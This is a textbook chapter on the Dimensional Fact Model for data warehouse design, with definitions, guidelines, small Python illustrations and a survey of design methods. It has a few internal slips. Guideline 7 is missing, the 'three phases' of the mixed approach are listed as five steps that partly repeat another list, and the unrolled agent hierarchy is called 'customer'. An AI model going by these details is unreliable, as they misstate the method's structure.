•	Supporting the dialogue between the designer and the end users to refine the specification of requirements
•	Creating a stable platform to ground logical design
•	Providing an expressive and non-ambiguous design documentation
The representation of reality built using the DFM consists of a set of fact schemata. The basic concepts modeled are facts, measures, dimensions, and hierarchies. In the following we intuitively define these concepts, referring the reader to Figure 3 that depicts a simple fact schema for modeling invoices at line granularity; a formal definition of the same concepts can be found in Golfarelli et al. (1998). Definition 1: A fact is a focus of interest for the decision-making process; typically, it models a set of events occurring in the enterprise world. A fact is graphically represented by a box with two sections, one for the fact name and one for the measures.
Examples of facts in the trade domain are sales, shipments, purchases, claims; in the financial domain: stock exchange transactions, contracts for insurance policies, granting of loans, bank statements, credit cards purchases. It is essential for a fact to have some dynamic aspects, that is, to evolve somehow across time. Guideline 1: The concepts represented in the data source by frequently-updated archives are good candidates for facts; those represented by almost-static archives are not. As a matter of fact, very few things are completely static; even the relationship between cities and regions might change, if some border were revised. Thus, the choice of facts should be based either on the average periodicity of changes, or on the specific interests of analysis. For instance, assigning a new sales manager to a sales department occurs less frequently than coupling a promotion to a product; thus, while the relationship between promotions and products is a good candidate to be modeled as a fact, that between sales managers and departments is not—except for the personnel manager, who is interested in analyzing the turnover!
Figure 3. A basic fact schema for the INVOICE LINE fact
Definition 2: A measure is a numerical property of a fact, and describes one of its quantitative aspects of interest for analysis. Measures are included in the bottom section of the fact.

For instance, each invoice line is measured by the number of units sold, the price per unit, the net amount, and so forth. The reason why measures should be numerical is that they are used for computations. A fact may also have no measures, if the only interesting thing to be recorded is the occurrence of events; in this case the fact scheme is said to be empty and is typically queried to count the events that occurred.

Definition 3: A dimension is a fact property with a finite domain and describes one of its analysis coordinates. The set of dimensions of a fact determines its finest representation granularity. Graphically, dimensions are represented as circles attached to the fact by straight lines.

Typical dimensions for the invoice fact are product, customer, agent, and date.

Guideline 2: At least one of the dimensions of the fact should represent time, at any granularity.

The relationship between measures and dimensions is expressed, at the instance level, by the concept of event.

Definition 4: A primary event is an occurrence of a fact, and is identified by a tuple of values, one for each dimension. Each primary event is described by one value for each measure.

Primary events are the elemental information which can be represented (in the cube metaphor, they correspond to the cube cells). In the invoice example they model the invoicing of one product to one customer made by one agent on one day; it is not possible to distinguish between invoices possibly made with different types (e.g., active,
passive, returned, etc.) or in different hours of the day.

Guideline 3: If the granularity of primary events as determined by the set of dimensions is coarser than the granularity of tuples in the data source, measures should be defined as either aggregations of numerical attributes in the data source, or as counts of tuples.

Remarkably, some multidimensional models in the literature focus on treating dimensions and measures symmetrically (Agrawal et al., 1995; Gyssens & Lakshmanan, 1997). This is an important achievement from both the point of view of the uniformity of the logical model and that of the flexibility of OLAP operators. Nevertheless we claim that, at a conceptual level, distinguishing between measures and dimensions is important since it allows logical design to be more specifically aimed at the efficiency required by data warehousing applications.

Aggregation is the basic OLAP operation, since it allows significant information useful for decision support to be summarized from large amounts of data. From a conceptual point of view, aggregation is carried out on primary events thanks to the definition of dimension attributes and hierarchies.

Definition 5: A dimension attribute is a property, with a finite domain, of a dimension. Like dimensions, it is represented by a circle.

For instance, a product is described by its type, category, and brand; a customer, by its city and its nation. The relationships between dimension attributes are expressed by hierarchies.

Definition 6: A hierarchy is a directed tree, rooted in a dimension, whose nodes are all the dimension attributes that describe that dimension, and whose arcs model many-to-one associations between pairs of dimension attributes. Arcs are graphically represented by straight lines.
Guideline 4: Hierarchies should reproduce the pattern of interattribute functional dependencies expressed by the data source.

Hierarchies determine how primary events can be aggregated into secondary events and selected significantly for the decision-making process. The dimension in which a hierarchy is rooted defines its finest aggregation granularity, while the other dimension attributes define progressively coarser granularities. For instance, thanks to the existence of a many-to-one association between products and their categories, the invoicing events may be grouped according to the category of the products.

Definition 7: Given a set of dimension attributes, each tuple of their values identifies a secondary event that aggregates all the corresponding primary events. Each secondary event is described by a value for each measure that summarizes the values taken by the same measure in the corresponding primary events.

We close this section by surveying some alternative terminology used either in the literature or in the commercial tools. There is
substantial agreement on using the term dimensions to designate the “entry points” to classify and identify events; while we refer in particular to the attribute determining the minimum fact granularity, sometimes the whole hierarchies are named as dimensions (for instance, the term “time dimension” often refers to the whole hierarchy built on dimension date). Measures are sometimes called variables or metrics. Finally, in some data warehousing tools, the term hierarchy denotes each single branch of the tree rooted in a dimension.
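To make Definitions 4 and 7 more concrete, the following Python sketch (not part of the DFM itself; the attribute names and sample data are invented for illustration) represents a few primary events of the INVOICE LINE fact as one value per dimension plus the measures, and rolls them up into secondary events along the product → category association by summing an additive measure.

from collections import defaultdict

# Hypothetical product -> category association implied by the product hierarchy.
category_of = {"bread": "food", "milk": "food", "shirt": "clothing"}

# Primary events: one value per dimension (date, customer, product) plus measures.
primary_events = [
    {"date": "2005-01-10", "customer": "Smith",  "product": "bread", "quantity": 10, "net amount": 12.0},
    {"date": "2005-01-10", "customer": "Smith",  "product": "milk",  "quantity":  5, "net amount":  7.5},
    {"date": "2005-01-10", "customer": "O'Hara", "product": "shirt", "quantity":  2, "net amount": 30.0},
]

# Secondary events: aggregate primary events by (date, category), summing the additive measures.
secondary = defaultdict(lambda: {"quantity": 0, "net amount": 0.0})
for e in primary_events:
    key = (e["date"], category_of[e["product"]])
    secondary[key]["quantity"] += e["quantity"]
    secondary[key]["net amount"] += e["net amount"]

for key, measures in secondary.items():
    print(key, measures)

Each key of the resulting dictionary plays the role of a secondary event identified by a tuple of dimension-attribute values, as in Definition 7.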
THE DIMENSIONAL FACT MODEL: ADVANCED MODELING

The constructs we introduce in this section, with the support of Figure 4, are descriptive and cross-dimension attributes; convergences; shared, incomplete, recursive, and dynamic hierarchies; multiple and optional arcs; and additivity. Though some of them are not necessary in the simplest and most common modeling situations, they are quite useful in order to better express the multitude of conceptual shades that characterize real-world scenarios. In particular we will see how, following the introduction of some of these constructs, hierarchies will no longer be defined as trees but become, in the general case, directed graphs.

Figure 4. The complete fact schema for the INVOICE LINE fact
Descriptive Attributes

In several cases it is useful to represent additional information about a dimension attribute, though it is not interesting to use such information for aggregation. For instance, the user may wish to know the address of each store, but will hardly be interested in aggregating sales according to the address of the store.

Definition 8: A descriptive attribute specifies a property of a dimension attribute, to which it is related by an x-to-one association. Descriptive attributes are not used for aggregation; they are always leaves of their hierarchy and are graphically represented by horizontal lines.

There are two main reasons why a descriptive attribute should not be used for aggregation:

Guideline 5: A descriptive attribute either has a continuously-valued domain (for instance, the weight of a product), or is related to a dimension attribute by a one-to-one association (for instance, the address of a customer).

Cross-Dimension Attributes

Definition 9: A cross-dimension attribute is a (either dimension or descriptive) attribute whose value is determined by the combination of two or more dimension attributes, possibly belonging to different hierarchies. It is denoted by connecting through a curve line the arcs that determine it.

For instance, if the VAT on a product depends on both the product category and the state where the product is sold, it can be represented by a cross-dimension attribute as shown in Figure 4.

Convergence

Consider the geographic hierarchy on dimension customer (Figure 4): customers live in cities, which are grouped into states belonging to nations. Suppose that customers are grouped into sales districts as well, and that no inclusion relationships exist between districts and cities/states; on the other hand, sales districts never cross the nation boundaries. In this case, each customer belongs to exactly one nation whichever of the two paths is followed (customer → city → state → nation or customer → sales district → nation).

Definition 10: A convergence takes place when two dimension attributes within a hierarchy are connected by two or more alternative paths of many-to-one associations. Convergences are represented by letting two or more arcs converge on the same dimension attribute.

The existence of apparently equal attributes does not always determine a convergence. If in the invoice fact we had a brand city attribute on the product hierarchy, representing the city where a brand is manufactured, there would be no convergence with attribute (customer) city, since a product manufactured in a city can obviously be sold to customers of other cities as well.

Optional Arcs

Definition 11: An optional arc models the fact that an association represented within the fact scheme is undefined for a subset of the events. An optional arc is graphically denoted by marking it with a dash.

For instance, attribute diet takes a value only for food products; for the other products, it is undefined. In the presence of a set of optional arcs exiting from the same dimension attribute, their coverage can be denoted in order to pose a constraint on
the optionalities involved. Like for IS-A hierarchies in the E/R model, the coverage of a set of optional arcs is characterized by two independent coordinates. Let a be a dimension attribute, and b1, ..., bm be its children attributes connected by optional arcs:

• The coverage is total if each value of a always corresponds to a value for at least one of its children; conversely, if some values of a exist for which all of its children are undefined, the coverage is said to be partial.
• The coverage is disjoint if each value of a corresponds to a value for, at most, one of its children; conversely, if some values of a exist that correspond to values for two or more children, the coverage is said to be overlapped.
Thus, overall, there are four possible coverages, denoted by T-D, T-O, P-D, and P-O. Figure 4 shows an example of optionality annotated with its coverage. We assume that products can have three types: food, clothing, and household; since expiration date and size are defined only for, respectively, food and clothing, the coverage is partial and disjoint.
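As a hedged illustration only (the product names and defined children below are invented), this small Python snippet classifies the coverage of a set of optional arcs by checking, for each value of the father attribute a, how many of its children b1, ..., bm are defined:

def coverage(children_defined):
    # children_defined: for each value of a, the set of children that are defined for it.
    total = all(len(s) >= 1 for s in children_defined.values())
    disjoint = all(len(s) <= 1 for s in children_defined.values())
    return ("T" if total else "P") + "-" + ("D" if disjoint else "O")

# Food products define expiration date, clothing defines size, household products define neither.
defined = {"bread": {"expiration date"}, "shirt": {"size"}, "broom": set()}
print(coverage(defined))  # P-D: partial (broom has no defined child) and disjoint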
Multiple Arcs

In most cases, as already said, hierarchies include attributes related by many-to-one associations. On the other hand, in some situations it is necessary to include also attributes that, for a single value taken by their father attribute, take several values.

Figure 5. The fact schema for the SALES fact
Definition 12: A multiple arc is an arc, within a hierarchy, modeling a many-to-many association between the two dimension attributes it connects. Graphically, it is denoted by doubling the line that represents the arc.

Consider the fact schema modeling the sales of books in a library, represented in Figure 5, whose dimensions are date and book. Users will probably be interested in analyzing sales for each book author; on the other hand, since some books have two or more authors, the relationship between book and author must be modeled as a multiple arc.

Guideline 6: In presence of many-to-many associations, summarizability is no longer guaranteed, unless the multiple arc is properly weighted. Multiple arcs should be used sparingly since, in ROLAP logical design, they require complex solutions.

Summarizability is the property of correctly summarizing measures along hierarchies (Lenz & Shoshani, 1997). Weights restore summarizability, but their introduction is artificial in several cases; for instance, in the book sales fact, each author of a multiauthored book should be assigned a normalized weight expressing her "contribution" to the book.
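The following sketch (Python, with invented book titles, authors, and an assumed equal-split weighting policy) shows how a weighted multiple arc restores summarizability in the book sales example: each author of a multi-authored book receives a normalized weight, so that the sales measure allocated to authors still sums to the original total.

# Sales of books (additive measure) and the many-to-many book -> author association.
sales = {"book A": 100, "book B": 60}
authors_of = {"book A": ["Rossi", "Bianchi"], "book B": ["Verdi"]}

# Normalized weights: here simply 1/number-of-authors per book (an assumed policy).
by_author = {}
for book, qty in sales.items():
    weight = 1.0 / len(authors_of[book])
    for author in authors_of[book]:
        by_author[author] = by_author.get(author, 0.0) + qty * weight

print(by_author)                # {'Rossi': 50.0, 'Bianchi': 50.0, 'Verdi': 60.0}
print(sum(by_author.values()))  # 160.0, equal to total sales: summarizability is preserved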
Shared Hierarchies

Sometimes, large portions of hierarchies are replicated twice or more in the same fact schema. A typical example is the temporal hierarchy:
a fact frequently has more than one dimension of type date, with different semantics, and it may be useful to define on each of them a temporal hierarchy month-week-year. Another example is given by geographic hierarchies, which may be defined starting from any location attribute in the fact schema. To avoid redundancy, the DFM provides a graphical shorthand for denoting hierarchy sharing.

Figure 4 shows two examples of shared hierarchies. Fact INVOICE LINE has two date dimensions, with semantics invoice date and order date, respectively. This is denoted by doubling the circle that represents attribute date and specifying two roles invoice and order on the entering arcs. The second shared hierarchy is the one on agent, that may have two roles: the ordering agent, that is a dimension, and the agent who is responsible for a customer (optional).

Guideline 8: Explicitly representing shared hierarchies on the fact schema is important since, during ROLAP logical design, it enables ad hoc solutions aimed at avoiding replication of data in dimension tables.
Ragged Hierarchies

Let a1, ..., an be a sequence of dimension attributes that define a path within a hierarchy (such as city, state, nation). Up to now we assumed that, for each value of a1, exactly one value for every other attribute on the path exists. In the previous case, this is actually true for each city in the U.S., while it is false for most European countries
where no decomposition in states is defined (see Figure 6).

Definition 13: A ragged (or incomplete) hierarchy is a hierarchy where, for some instances, the values of one or more attributes are missing (since undefined or unknown). A ragged hierarchy is graphically denoted by marking with a dash the attributes whose values may be missing.

As stated by Niemi et al. (2001), within a ragged hierarchy each aggregation level has precise and consistent semantics, but the different hierarchy instances may have different lengths since one or more levels are missing, making the interlevel relationships not uniform (the father of "San Francisco" belongs to level state, the father of "Rome" to level nation). There is a noticeable difference between a ragged hierarchy and an optional arc. In the first case we model the fact that, for some hierarchy instances, there is no value for one or more attributes in any position of the hierarchy. Conversely, through an optional arc we model the fact that there is no value for an attribute and for all of its descendents.

Guideline 9: Ragged hierarchies may lead to summarizability problems. A way for avoiding them is to fragment a fact into two or more facts, each including a subset of the hierarchies characterized by uniform interlevel relationships.
Figure 6. Ragged geographic hierarchies
Thus, in the invoice example, fragmenting INVOICE LINE into U.S. INVOICE LINE and E.U. INVOICE LINE (the first with the state attribute, the second without state) restores the completeness of the geographic hierarchy.
Unbalanced Hierarchies

Definition 14: An unbalanced (or recursive) hierarchy is a hierarchy where, though interattribute relationships are consistent, the instances may have different lengths. Graphically, it is represented by introducing a cycle within the hierarchy.

A typical example of unbalanced hierarchy is the one that models the dependence interrelationships between working persons. Figure 4 includes an unbalanced hierarchy on sale agents: there are no fixed roles for the different agents, and the different "leaf" agents have a variable number of supervisor agents above them.

Guideline 10: Recursive hierarchies lead to complex solutions during ROLAP logical design and to poor querying performance. A way for avoiding them is to "unroll" them for a given number of times.

For instance, in the agent example, if the user states that two is the maximum number of interesting levels for the dependence relationship, the customer hierarchy could be transformed as in Figure 7.

Figure 7. Unrolling the agent hierarchy

Dynamic Hierarchies

Time is a key factor in data warehousing systems, since the decision process is often based on the evaluation of historical series and on the comparison between snapshots of the enterprise taken at different moments. The multidimensional models implicitly assume that the only dynamic components described in a cube are the events that instantiate it; hierarchies are traditionally considered to be static. Of course this is not correct: sales managers alternate, though slowly, on different departments; new products are added every week to those already being sold; the product categories change, and their relationship with products changes; sales districts can be modified, and a customer may be moved from one district to another.1

The conceptual representation of hierarchy dynamicity is strictly related to its impact on user queries. In fact, in the presence of a dynamic hierarchy we may picture three different temporal scenarios for analyzing events (SAP, 1998):

• Today for yesterday: All events are referred to the current configuration of hierarchies. Thus, assuming on January 1, 2005 the responsible agent for customer Smith has changed from Mr. Black to Mr. White, and that a new customer O'Hara has been acquired and assigned to Mr. Black, when computing the agent commissions all invoices for Smith are attributed to Mr. White, while only invoices for O'Hara are attributed to Mr. Black.
• Yesterday for today: All events are referred to some past configuration of hierarchies. In the previous example, all invoices for Smith are attributed to Mr. Black, while invoices for O'Hara are not considered.
• Today or yesterday (or historical truth): Each event is referred to the configuration hierarchies had at the time the event occurred. Thus, the invoices for Smith up to
2004 and those for O'Hara are attributed to Mr. Black, while invoices for Smith from 2005 are attributed to Mr. White.

While in the agent example dynamicity concerns an arc of a hierarchy (the one expressing the many-to-one association between customer and agent), in some cases it may as well concern a dimension attribute: for instance, the name of a product category may change. Even in this case, the different scenarios are defined in much the same way as before.

On the conceptual schema, it is useful to denote which scenarios the user is interested in for each arc and attribute, since this heavily impacts on the specific solutions to be adopted during logical design. By default, we will assume that the only interesting scenario is today for yesterday—it is the most common one, and the one whose implementation on the star schema is simplest. If some attributes or arcs require different scenarios, the designer should specify them on a table like Table 2.
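A minimal Python sketch of the three scenarios, assuming a hypothetical assignment table that records the responsible agent of each customer with a validity interval (the dates and names below simply reproduce the Smith/O'Hara example):

# Each row: (customer, agent, valid_from, valid_to); None means "still valid".
assignments = [
    ("Smith",  "Black", "1900-01-01", "2004-12-31"),
    ("Smith",  "White", "2005-01-01", None),
    ("O'Hara", "Black", "2005-01-01", None),
]

def agent_of(customer, at_date):
    # Return the agent responsible for the customer on the given (ISO-formatted) date.
    for cust, agent, start, end in assignments:
        if cust == customer and start <= at_date and (end is None or at_date <= end):
            return agent
    return None

invoices = [("Smith", "2004-06-10"), ("Smith", "2005-03-02"), ("O'Hara", "2005-04-15")]

today_for_yesterday = [(c, agent_of(c, "2005-12-31")) for c, d in invoices]  # current configuration
yesterday_for_today = [(c, agent_of(c, "2004-12-31")) for c, d in invoices]  # past configuration
historical_truth    = [(c, agent_of(c, d)) for c, d in invoices]             # configuration at event time

print(today_for_yesterday)  # Smith -> White, Smith -> White, O'Hara -> Black
print(yesterday_for_today)  # Smith -> Black, Smith -> Black, O'Hara -> None (not considered)
print(historical_truth)     # Smith -> Black, Smith -> White, O'Hara -> Black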
Additivity

Aggregation requires defining a proper operator to compose the measure values characterizing primary events into measure values characterizing each secondary event. From this point of view, we may distinguish three types of measures (Lenz & Shoshani, 1997):

• Flow measures: They refer to a time period, and are cumulatively evaluated at the end of that period. Examples are the number of products sold in a day, the monthly revenue, the number of those born in a year.
• Stock measures: They are evaluated at particular moments in time. Examples are the number of products in a warehouse, the number of inhabitants of a city, the temperature measured by a gauge.
• Unit measures: They are evaluated at particular moments in time, but they are expressed in relative terms. Examples are the unit price of a product, the discount percentage, the exchange rate of a currency.

The aggregation operators that can be used on the three types of measures are summarized in Table 3.
Table 2. Temporal scenarios for the INVOICE fact

arc/attribute         | today for yesterday | yesterday for today | today or yesterday
customer-resp. agent  | YES                 | YES                 | YES
customer-city         | YES                 |                     | YES
sale district         | YES                 |                     |
Table 3. Valid aggregation operators for the three types of measures (Lenz & Shoshani, 1997)

               | temporal hierarchies | nontemporal hierarchies
flow measures  | SUM, AVG, MIN, MAX   | SUM, AVG, MIN, MAX
stock measures | AVG, MIN, MAX        | SUM, AVG, MIN, MAX
unit measures  | AVG, MIN, MAX        | AVG, MIN, MAX
Definition 15: A measure is said to be additive along a dimension if its values can be aggregated along the corresponding hierarchy by the sum operator; otherwise it is called nonadditive. A nonadditive measure is nonaggregable if no other aggregation operator can be used on it.

Table 3 shows that, in general, flow measures are additive along all dimensions, stock measures are nonadditive along temporal hierarchies, and unit measures are nonadditive along all dimensions. On the invoice scheme, most measures are additive. For instance, quantity has flow type: the total quantity invoiced in a month is the sum of the quantities invoiced in the single days of that month. Measure unit price has unit type and is nonadditive along all dimensions. Though it cannot be summed up, it can still be aggregated by using operators such as average, maximum, and minimum.

Since additivity is the most frequent case, in order to simplify the graphic notation in the DFM, only the exceptions are represented explicitly. In particular, a measure is connected to the dimensions along which it is nonadditive by a dashed line labeled with the other aggregation operators (if any) which can be used instead. If a measure is aggregated through the same operator along all dimensions, that operator can be simply reported on its side (see for instance unit price in Figure 4).
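Table 3 can also be read as a simple lookup that a hypothetical design or querying tool might use to reject invalid aggregations; the Python sketch below encodes it directly (the classification of the invoice measures follows the text above, everything else is assumed for illustration):

# Valid aggregation operators per (measure type, hierarchy type), as in Table 3.
VALID_OPERATORS = {
    ("flow",  "temporal"):    {"SUM", "AVG", "MIN", "MAX"},
    ("flow",  "nontemporal"): {"SUM", "AVG", "MIN", "MAX"},
    ("stock", "temporal"):    {"AVG", "MIN", "MAX"},
    ("stock", "nontemporal"): {"SUM", "AVG", "MIN", "MAX"},
    ("unit",  "temporal"):    {"AVG", "MIN", "MAX"},
    ("unit",  "nontemporal"): {"AVG", "MIN", "MAX"},
}

measure_type = {"quantity": "flow", "unit price": "unit"}  # from the invoice schema

def can_aggregate(measure, hierarchy_kind, operator):
    return operator in VALID_OPERATORS[(measure_type[measure], hierarchy_kind)]

print(can_aggregate("quantity", "temporal", "SUM"))    # True: flow measures are additive
print(can_aggregate("unit price", "temporal", "SUM"))  # False: unit measures are nonadditive
print(can_aggregate("unit price", "temporal", "AVG"))  # True: average is still allowed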
APPROACHES TO CONCEPTUAL DESIGN

In this section we discuss how conceptual design can be framed within a methodology for DW design. The approaches to DW design are usually classified in two categories (Winter & Strauch, 2003):

• Data-driven (or supply-driven) approaches that design the DW starting from a detailed analysis of the data sources; user requirements impact on design by allowing the designer to select which chunks of data are relevant for decision making and by determining their structure according to the multidimensional model (Golfarelli et al., 1998; Hüsemann et al., 2000).
• Requirement-driven (or demand-driven) approaches start from determining the information requirements of end users, and how to map these requirements onto the available data sources is investigated only a posteriori (Prakash & Gosain, 2003; Schiefer, List, & Bruckner, 2002).
While data-driven approaches somehow simplify the design of ETL (extraction, transformation, and loading), since each piece of data in the DW is rooted in one or more attributes of the sources, they give user requirements a secondary role in determining the information contents for analysis, and give the designer little support in identifying facts, dimensions, and measures. Conversely, requirement-driven approaches bring user requirements to the foreground, but require a larger effort when designing ETL.
Data-Driven Approaches

Data-driven approaches are feasible when all of the following are true: (1) detailed knowledge of data sources is available a priori or easily achievable; (2) the source schemata exhibit a good degree of normalization; (3) the complexity of source schemata is not high. In practice, when the chosen architecture for the DW relies on a reconciled level (or operational data store) these requirements are largely satisfied: in fact, normalization and detailed knowledge are guaranteed by the source integration process. The same holds, thanks to a careful source recognition activity, in the frequent case when the source is a single relational database, well-designed and not very large. In a data-driven approach, requirement analysis is typically carried out informally, based on simple requirement glossaries (Lechtenbörger,
2001) rather than on formal diagrams. Conceptual design is then heavily rooted on source schemata and can be largely automated. In particular, the designer is actively supported in identifying dimensions and measures, in building hierarchies, in detecting convergences and shared hierarchies. For instance, the approach proposed by Golfarelli et al. (1998) consists of five steps that, starting from the source schema expressed either by an E/R schema or a relational schema, create the conceptual schema for the DW:

1. Choose facts of interest on the source schema
2. For each fact, build an attribute tree that captures the functional dependencies expressed by the source schema
3. Edit the attribute trees by adding/deleting attributes and functional dependencies
4. Choose dimensions and measures
5. Create the fact schemata

While step 2 is completely automated, some advanced constructs of the DFM are manually applied by the designer during step 5. On-the-field experience shows that, when applicable, the data-driven approach is preferable since it reduces the overall time necessary for design. In fact, not only conceptual design can be partially automated, but even ETL design is made easier since the mapping between the data sources and the DW is derived at no additional cost during conceptual design.

Requirement-Driven Approaches

Conversely, within a requirement-driven framework, in the absence of knowledge of the source schema, the building of hierarchies cannot be automated; the main assurance of a satisfactory result is the skill and experience of the designer, and the designer's ability to interact with the domain experts. In this case it may be worth adopting formal techniques for specifying requirements in order to more accurately capture users' needs; for instance, the goal-oriented approach proposed by Giorgini, Rizzi, and Garzetti (2005) is based on an extension of the Tropos formalism and includes the following steps:

1. Create, in the Tropos formalism, an organizational model that represents the stakeholders, their relationships, their goals as well as the relevant facts for the organization and the attributes that describe them.
2. Create, in the Tropos formalism, a decisional model that expresses the analysis goals of decision makers and their information needs.
3. Create preliminary fact schemata from the decisional model.
4. Edit the fact schemata, for instance, by detecting functional dependencies between dimensions, recognizing optional dimensions, and unifying measures that only differ for the aggregation operator.
This approach is, in our view, more difficult to pursue than the previous one. Nevertheless, it is the only alternative when a detailed analysis of data sources cannot be made (for instance, when the DW is fed from an ERP system), or when the sources come from legacy systems whose complexity discourages recognition and normalization.
Mixed Approaches

Finally, a few mixed approaches to design have also been devised, aimed at joining the facilities of data-driven approaches with the guarantees of requirement-driven ones (Bonifati, Cattaneo, Ceri, Fuggetta, & Paraboschi, 2001; Giorgini et al., 2005). Here the user requirements, captured by means of a goal-oriented formalism, are matched with the schema of the source database to drive the algorithm that generates the conceptual schema for the DW. For instance, the approach proposed by Giorgini et al. (2005) encompasses three phases:
1. Create, in the Tropos formalism, an organizational model that represents the stakeholders, their relationships, their goals, as well as the relevant facts for the organization and the attributes that describe them.
2. Create, in the Tropos formalism, a decisional model that expresses the analysis goals of decision makers and their information needs.
3. Map facts, dimensions, and measures identified during requirement analysis onto entities in the source schema.
4. Generate a preliminary conceptual schema by navigating the functional dependencies expressed by the source schema.
5. Edit the fact schemata to fully meet the user expectations.
Note that, though step 4 may be based on the same algorithm employed in step 2 of the data-driven approach, here navigation is not "blind" but rather it is actively biased by the user requirements. Thus, the preliminary fact schemata generated here may be considerably simpler and smaller than those obtained in the data-driven approach. Besides, while in that approach the analyst is asked to identify facts, dimensions, and measures directly on the source schema, here such identification is driven by the diagrams developed during requirement analysis. Overall, the mixed framework is recommendable when source schemata are well-known but their size and complexity are substantial. In fact, the cost for a more careful and formal analysis of requirements is balanced by the quickening of conceptual design.
OPEN ISSUES

A lot of work has been done in the field of conceptual modeling for DWs; nevertheless some very important issues still remain open. We report some of them in this section, as they emerged during joint discussion at the Perspective Seminar on "Data Warehousing at the Crossroads" that took place at Dagstuhl, Germany, in August 2004.

• Lack of a standard: Though several conceptual models have been proposed, none of them has been accepted as a standard so far, and all vendors propose their own proprietary design methods. We see two main reasons for this: (1) though the conceptual models devised are semantically rich, some of the modeled properties cannot be expressed in the target logical models, so the translation from conceptual to logical is incomplete; and (2) commercial CASE tools currently enable designers to directly draw logical schemata, thus no industrial push is given to any of the models. On the other hand, a unified conceptual model for DWs, implemented by sophisticated CASE tools, would be a valuable support for both the research and industrial communities.

• Design patterns: In software engineering, design patterns are a precious support for designers since they propose standard solutions to address common modeling problems. Recently, some preliminary attempts have been made to identify relevant patterns for multidimensional design, aimed at assisting DW designers during their modeling tasks by providing an approach for recognizing dimensions in a systematic and usable way (Jones & Song, 2005). Though we agree that DW design would undoubtedly benefit from adopting a pattern-based approach, and we also recognize the utility of patterns in increasing the effectiveness of teaching how to design, we believe that further research is necessary in order to achieve a more comprehensive characterization of multidimensional patterns for both conceptual and logical design.

• Modeling security: Information security is a serious requirement that must be carefully considered in software engineering, not in isolation but as an issue underlying all stages of the development life cycle, from requirement analysis to implementation and maintenance. The problem of information security is even bigger in DWs, as these systems are used to discover crucial business information in strategic decision making. Some approaches to security in DWs, focused, for instance, on access control and multilevel security, can be found in the literature (see, for instance, Priebe & Pernul, 2000), but none of them treats security as comprising all stages of the DW development cycle. Besides, the classical security model used in transactional databases, centered on tables, rows, and attributes, is unsuitable for DWs and should be replaced by an ad hoc model centered on the main concepts of multidimensional modeling—such as facts, dimensions, and measures.

• Modeling ETL: ETL is a cornerstone of the data warehousing process, and its design and implementation may easily take 50% of the total time for setting up a DW. In the literature some approaches were devised for conceptual modeling of the ETL process from either the functional (Vassiliadis, Simitsis, & Skiadopoulos, 2002), the dynamic (Bouzeghoub, Fabret, & Matulovic, 1999), or the static (Calvanese, De Giacomo, Lenzerini, Nardi, & Rosati, 1998) points of view. Recently, also some interesting work on translating conceptual into logical ETL schemata has been done (Simitsis, 2005). Nevertheless, issues such as the optimization of ETL logical schemata are not very well understood. Besides, there is a need for techniques that automatically propagate changes that occur in the source schemas to the ETL process.
CONCLUSION

In this chapter we have proposed a set of solutions for conceptual modeling of a DW according to the DFM. Since 1998, the DFM has been successfully adopted in real DW projects, mainly in the fields of retail, large distribution, telecommunications, health, justice, and education, where it has proved expressive enough to capture a wide variety of modeling situations. Remarkably, in most projects the DFM was also used to directly support dialogue with end users aimed at validating requirements, and to express the expected workload for the DW to be used for logical and physical design. This was made possible by the adoption of a CASE tool named WAND (warehouse integrated designer), entirely developed at the University of Bologna, that assists the designer in structuring a DW. WAND carries out data-driven conceptual design in a semiautomatic fashion starting from the logical scheme of the source database (see Figure 8), allows for a core workload to be defined on the conceptual scheme, and carries out workload-based logical design to produce an optimized relational scheme for the DW (Golfarelli & Rizzi, 2001). Overall, our on-the-field experience confirmed that adopting conceptual modeling within a DW project brings great advantages since:
Figure 8. Editing a fact schema in WAND
• Conceptual schemata are the best support for discussing, verifying, and refining user specifications since they achieve the optimal trade-off between expressivity and clarity. Star schemata could hardly be used to this purpose.
• For the same reason, conceptual schemata are an irreplaceable component of the documentation for the DW project.
• They provide a solid and platform-independent foundation for logical and physical design.
• They are an effective support for maintaining and extending the DW.
• They make turn-over of designers and administrators on a DW project quicker and simpler.
REFERENCES

Abelló, A., Samos, J., & Saltor, F. (2002, July 17-19). YAM2 (Yet another multidimensional model): An extension of UML. In Proceedings of the International Database Engineering & Applications Symposium (pp. 172-181). Edmonton, Canada.

Agrawal, R., Gupta, A., & Sarawagi, S. (1995). Modeling multidimensional databases (IBM Research Report). IBM Almaden Research Center, San Jose, CA.

Bonifati, A., Cattaneo, F., Ceri, S., Fuggetta, A., & Paraboschi, S. (2001). Designing data marts for data warehouses. ACM Transactions on Software Engineering and Methodology, 10(4), 452-483.

Bouzeghoub, M., Fabret, F., & Matulovic, M. (1999). Modeling data warehouse refreshment process as a workflow application. In Proceedings of the International Workshop on Design and Management of Data Warehouses, Heidelberg, Germany.
Cabibbo, L., & Torlone, R. (1998, March 23-27). A logical approach to multidimensional databases. In Proceedings of the International Conference on Extending Database Technology (pp. 183-197). Valencia, Spain. Calvanese, D., De Giacomo, G., Lenzerini, M., Nardi, D., & Rosati, R. (1998, August 20-22). Information integration: Conceptual modeling and reasoning support. In Proceedings of the International Conference on Cooperative Information Systems (pp. 280-291). New York. Datta, A., & Thomas, H. (1997). A conceptual model and algebra for on-line analytical processing in data warehouses. In Proceedings of the Workshop for Information Technology and Systems (pp. 91-100). Fahrner, C., & Vossen, G. (1995). A survey of database transformations based on the entity-relationship model. Data & Knowledge Engineering, 15(3), 213-250. Franconi, E., & Kamble, A. (2004a, June 7-11). The GMD data model and algebra for multidimensional information. In Proceedings of the Conference on Advanced Information Systems Engineering (pp. 446-462). Riga, Latvia. Franconi, E., & Kamble, A. (2004b). A data warehouse conceptual data model. In Proceedings of the International Conference on Statistical and Scientific Database Management (pp. 435-436). Giorgini, P., Rizzi, S., & Garzetti, M. (2005, November 4-5). Goal-oriented requirement analysis for data warehouse design. In Proceedings of the ACM International Workshop on Data Warehousing and OLAP (pp. 47-56). Bremen, Germany. Golfarelli, M., Maio, D., & Rizzi, S. (1998). The dimensional fact model: A conceptual model for data warehouses. International Journal of Cooperative Information Systems, 7(2-3), 215-247.
